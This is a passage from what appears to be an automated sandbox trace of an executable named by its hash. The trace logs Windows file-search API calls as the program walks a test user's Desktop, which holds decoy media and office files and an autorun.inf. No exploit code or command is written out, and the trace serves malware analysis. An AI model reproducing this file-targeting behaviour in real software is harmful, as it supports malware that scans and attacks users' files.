ftLastWriteTime.dwLowDateTime=0x775764e0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0x16292, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0298.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc8d580, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0xbdec11f0, ftLastAccessTime.dwHighDateTime=0x1d7e76f, ftLastWriteTime.dwLowDateTime=0xbdec11f0, ftLastWriteTime.dwHighDateTime=0x1d7e76f, nFileSizeHigh=0x0, nFileSizeLow=0x3621, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp", cAlternateFileName="")) returned 1 [0298.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd362020, ftCreationTime.dwHighDateTime=0x1d7e754, ftLastAccessTime.dwLowDateTime=0x709af980, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x709af980, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0298.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28b5bac0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xc3fc26e0, ftLastAccessTime.dwHighDateTime=0x1d7de49, ftLastWriteTime.dwLowDateTime=0xc3fc26e0, ftLastWriteTime.dwHighDateTime=0x1d7de49, nFileSizeHigh=0x0, nFileSizeLow=0xe2c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg", cAlternateFileName="")) returned 1 [0298.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9514b0, ftCreationTime.dwHighDateTime=0x1d7e727, ftLastAccessTime.dwLowDateTime=0xa82e8ec0, ftLastAccessTime.dwHighDateTime=0x1d7e737, ftLastWriteTime.dwLowDateTime=0xa82e8ec0, ftLastWriteTime.dwHighDateTime=0x1d7e737, nFileSizeHigh=0x0, nFileSizeLow=0x114f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv", cAlternateFileName="")) returned 1 [0298.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbdf3170, ftCreationTime.dwHighDateTime=0x1d7d9ba, ftLastAccessTime.dwLowDateTime=0x61bc6a40, ftLastAccessTime.dwHighDateTime=0x1d7e037, ftLastWriteTime.dwLowDateTime=0x61bc6a40, ftLastWriteTime.dwHighDateTime=0x1d7e037, nFileSizeHigh=0x0, nFileSizeLow=0x18100, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4", cAlternateFileName="")) returned 1 [0298.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81ccee0, ftCreationTime.dwHighDateTime=0x1d7e3a3, ftLastAccessTime.dwLowDateTime=0xbe248520, ftLastAccessTime.dwHighDateTime=0x1d7e450, ftLastWriteTime.dwLowDateTime=0xbe248520, ftLastWriteTime.dwHighDateTime=0x1d7e450, nFileSizeHigh=0x0, nFileSizeLow=0xebfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0298.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e0bb40, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0x603800f0, ftLastAccessTime.dwHighDateTime=0x1d7dcc5, ftLastWriteTime.dwLowDateTime=0x603800f0, ftLastWriteTime.dwHighDateTime=0x1d7dcc5, nFileSizeHigh=0x0, nFileSizeLow=0x43c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0298.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63377cb0, ftCreationTime.dwHighDateTime=0x1d7e254, ftLastAccessTime.dwLowDateTime=0xea3dd620, ftLastAccessTime.dwHighDateTime=0x1d7e3f6, ftLastWriteTime.dwLowDateTime=0xea3dd620, ftLastWriteTime.dwHighDateTime=0x1d7e3f6, nFileSizeHigh=0x0, nFileSizeLow=0x2061, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png", cAlternateFileName="")) returned 1 [0298.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d08e860, ftCreationTime.dwHighDateTime=0x1d7df82, ftLastAccessTime.dwLowDateTime=0x8ba89350, ftLastAccessTime.dwHighDateTime=0x1d7e736, ftLastWriteTime.dwLowDateTime=0x8ba89350, ftLastWriteTime.dwHighDateTime=0x1d7e736, nFileSizeHigh=0x0, nFileSizeLow=0x887b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0298.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0298.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0298.072] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.072] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde1be5b0, ftCreationTime.dwHighDateTime=0x1d7dfd4, ftLastAccessTime.dwLowDateTime=0x4b2d1de0, ftLastAccessTime.dwHighDateTime=0x1d7e2cd, ftLastWriteTime.dwLowDateTime=0x4b2d1de0, ftLastWriteTime.dwHighDateTime=0x1d7e2cd, nFileSizeHigh=0x0, nFileSizeLow=0x14620, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a", cAlternateFileName="EZB4HL~1.M4A")) returned 1 [0298.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dd7ce70, ftCreationTime.dwHighDateTime=0x1d7e6a4, ftLastAccessTime.dwLowDateTime=0x80906ca0, ftLastAccessTime.dwHighDateTime=0x1d7e744, ftLastWriteTime.dwLowDateTime=0x80906ca0, ftLastWriteTime.dwHighDateTime=0x1d7e744, nFileSizeHigh=0x0, nFileSizeLow=0x164ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv", cAlternateFileName="EKQ_ZA~1.MKV")) returned 1 [0298.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bb6d20, ftCreationTime.dwHighDateTime=0x1d7da34, ftLastAccessTime.dwLowDateTime=0x422f2480, ftLastAccessTime.dwHighDateTime=0x1d7e1f2, ftLastWriteTime.dwLowDateTime=0x422f2480, ftLastWriteTime.dwHighDateTime=0x1d7e1f2, nFileSizeHigh=0x0, nFileSizeLow=0xfbc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav", cAlternateFileName="ITP31J~1.WAV")) returned 1 [0298.074] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70de2f70, ftCreationTime.dwHighDateTime=0x1d7d9e0, ftLastAccessTime.dwLowDateTime=0xacedf40, ftLastAccessTime.dwHighDateTime=0x1d7df26, ftLastWriteTime.dwLowDateTime=0xacedf40, ftLastWriteTime.dwHighDateTime=0x1d7df26, nFileSizeHigh=0x0, nFileSizeLow=0x18ba2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi", cAlternateFileName="")) returned 1 [0298.074] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86086fc0, ftCreationTime.dwHighDateTime=0x1d7e5ff, ftLastAccessTime.dwLowDateTime=0xb412a290, ftLastAccessTime.dwHighDateTime=0x1d7e619, ftLastWriteTime.dwLowDateTime=0xb412a290, ftLastWriteTime.dwHighDateTime=0x1d7e619, nFileSizeHigh=0x0, nFileSizeLow=0x16d10, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt", cAlternateFileName="SSEWKY~1.PPT")) returned 1 [0298.074] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb41067f0, ftCreationTime.dwHighDateTime=0x1d7da4d, ftLastAccessTime.dwLowDateTime=0xc8fd0800, ftLastAccessTime.dwHighDateTime=0x1d7e3c4, ftLastWriteTime.dwLowDateTime=0xc8fd0800, ftLastWriteTime.dwHighDateTime=0x1d7e3c4, nFileSizeHigh=0x0, nFileSizeLow=0x4ad3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4", cAlternateFileName="UJK4SN~1.MP4")) returned 1 [0298.075] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6daef90, ftCreationTime.dwHighDateTime=0x1d7e36e, ftLastAccessTime.dwLowDateTime=0xdce993c0, ftLastAccessTime.dwHighDateTime=0x1d7e454, ftLastWriteTime.dwLowDateTime=0xdce993c0, ftLastWriteTime.dwHighDateTime=0x1d7e454, nFileSizeHigh=0x0, nFileSizeLow=0x4bc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf", cAlternateFileName="YZL8R1~1.SWF")) returned 1 [0298.075] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6daef90, ftCreationTime.dwHighDateTime=0x1d7e36e, ftLastAccessTime.dwLowDateTime=0xdce993c0, ftLastAccessTime.dwHighDateTime=0x1d7e454, ftLastWriteTime.dwLowDateTime=0xdce993c0, ftLastWriteTime.dwHighDateTime=0x1d7e454, nFileSizeHigh=0x0, nFileSizeLow=0x4bc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf", cAlternateFileName="YZL8R1~1.SWF")) returned 0 [0298.075] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.075] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde1be5b0, ftCreationTime.dwHighDateTime=0x1d7dfd4, ftLastAccessTime.dwLowDateTime=0x4b2d1de0, ftLastAccessTime.dwHighDateTime=0x1d7e2cd, ftLastWriteTime.dwLowDateTime=0x4b2d1de0, ftLastWriteTime.dwHighDateTime=0x1d7e2cd, nFileSizeHigh=0x0, nFileSizeLow=0x14620, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a", cAlternateFileName="EZB4HL~1.M4A")) returned 1 [0298.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dd7ce70, ftCreationTime.dwHighDateTime=0x1d7e6a4, ftLastAccessTime.dwLowDateTime=0x80906ca0, ftLastAccessTime.dwHighDateTime=0x1d7e744, ftLastWriteTime.dwLowDateTime=0x80906ca0, ftLastWriteTime.dwHighDateTime=0x1d7e744, nFileSizeHigh=0x0, nFileSizeLow=0x164ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv", cAlternateFileName="EKQ_ZA~1.MKV")) returned 1 [0298.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bb6d20, ftCreationTime.dwHighDateTime=0x1d7da34, ftLastAccessTime.dwLowDateTime=0x422f2480, ftLastAccessTime.dwHighDateTime=0x1d7e1f2, ftLastWriteTime.dwLowDateTime=0x422f2480, ftLastWriteTime.dwHighDateTime=0x1d7e1f2, nFileSizeHigh=0x0, nFileSizeLow=0xfbc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav", cAlternateFileName="ITP31J~1.WAV")) returned 1 [0298.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70de2f70, ftCreationTime.dwHighDateTime=0x1d7d9e0, ftLastAccessTime.dwLowDateTime=0xacedf40, ftLastAccessTime.dwHighDateTime=0x1d7df26, ftLastWriteTime.dwLowDateTime=0xacedf40, ftLastWriteTime.dwHighDateTime=0x1d7df26, nFileSizeHigh=0x0, nFileSizeLow=0x18ba2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi", cAlternateFileName="")) returned 1 [0298.077] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86086fc0, ftCreationTime.dwHighDateTime=0x1d7e5ff, ftLastAccessTime.dwLowDateTime=0xb412a290, ftLastAccessTime.dwHighDateTime=0x1d7e619, ftLastWriteTime.dwLowDateTime=0xb412a290, ftLastWriteTime.dwHighDateTime=0x1d7e619, nFileSizeHigh=0x0, nFileSizeLow=0x16d10, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt", cAlternateFileName="SSEWKY~1.PPT")) returned 1 [0298.077] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb41067f0, ftCreationTime.dwHighDateTime=0x1d7da4d, ftLastAccessTime.dwLowDateTime=0xc8fd0800, ftLastAccessTime.dwHighDateTime=0x1d7e3c4, ftLastWriteTime.dwLowDateTime=0xc8fd0800, ftLastWriteTime.dwHighDateTime=0x1d7e3c4, nFileSizeHigh=0x0, nFileSizeLow=0x4ad3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4", cAlternateFileName="UJK4SN~1.MP4")) returned 1 [0298.077] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6daef90, ftCreationTime.dwHighDateTime=0x1d7e36e, ftLastAccessTime.dwLowDateTime=0xdce993c0, ftLastAccessTime.dwHighDateTime=0x1d7e454, ftLastWriteTime.dwLowDateTime=0xdce993c0, ftLastWriteTime.dwHighDateTime=0x1d7e454, nFileSizeHigh=0x0, nFileSizeLow=0x4bc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf", cAlternateFileName="YZL8R1~1.SWF")) returned 1 [0298.077] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0298.077] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d0) returned 1 [0298.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1dc) returned 1 [0298.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af218) returned 1 [0298.078] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.078] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0298.078] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aef40 | out: lpFindFileData=0x1aef40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.078] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.079] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1dfe10, ftCreationTime.dwHighDateTime=0x1d7d73d, ftLastAccessTime.dwLowDateTime=0x590d3ff0, ftLastAccessTime.dwHighDateTime=0x1d7de66, ftLastWriteTime.dwLowDateTime=0x590d3ff0, ftLastWriteTime.dwHighDateTime=0x1d7de66, nFileSizeHigh=0x0, nFileSizeLow=0x16800, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg", cAlternateFileName="")) returned 1 [0298.079] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1866520, ftCreationTime.dwHighDateTime=0x1d7df30, ftLastAccessTime.dwLowDateTime=0xd42ebbb0, ftLastAccessTime.dwHighDateTime=0x1d7e5db, ftLastWriteTime.dwLowDateTime=0xd42ebbb0, ftLastWriteTime.dwHighDateTime=0x1d7e5db, nFileSizeHigh=0x0, nFileSizeLow=0x7511, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0298.079] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0298.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71272d6, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd8250b16, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf", cAlternateFileName="")) returned 1 [0298.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0298.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9a4740, ftCreationTime.dwHighDateTime=0x1d7e276, ftLastAccessTime.dwLowDateTime=0x19402410, ftLastAccessTime.dwHighDateTime=0x1d7e54f, ftLastWriteTime.dwLowDateTime=0x19402410, ftLastWriteTime.dwHighDateTime=0x1d7e54f, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0298.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63934470, ftCreationTime.dwHighDateTime=0x1d7e419, ftLastAccessTime.dwLowDateTime=0xbc7be2f0, ftLastAccessTime.dwHighDateTime=0x1d7e4b8, ftLastWriteTime.dwLowDateTime=0xbc7be2f0, ftLastWriteTime.dwHighDateTime=0x1d7e4b8, nFileSizeHigh=0x0, nFileSizeLow=0xa1bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc", cAlternateFileName="")) returned 1 [0298.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfa0da0, ftCreationTime.dwHighDateTime=0x1d7d73f, ftLastAccessTime.dwLowDateTime=0x2ce7c810, ftLastAccessTime.dwHighDateTime=0x1d7e662, ftLastWriteTime.dwLowDateTime=0x2ce7c810, ftLastWriteTime.dwHighDateTime=0x1d7e662, nFileSizeHigh=0x0, nFileSizeLow=0x16df9, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0298.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0298.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fb7f0, ftCreationTime.dwHighDateTime=0x1d7db33, ftLastAccessTime.dwLowDateTime=0x305a1bd0, ftLastAccessTime.dwHighDateTime=0x1d7dea9, ftLastWriteTime.dwLowDateTime=0x305a1bd0, ftLastWriteTime.dwHighDateTime=0x1d7dea9, nFileSizeHigh=0x0, nFileSizeLow=0xed9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0298.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e1e30, ftCreationTime.dwHighDateTime=0x1d7da06, 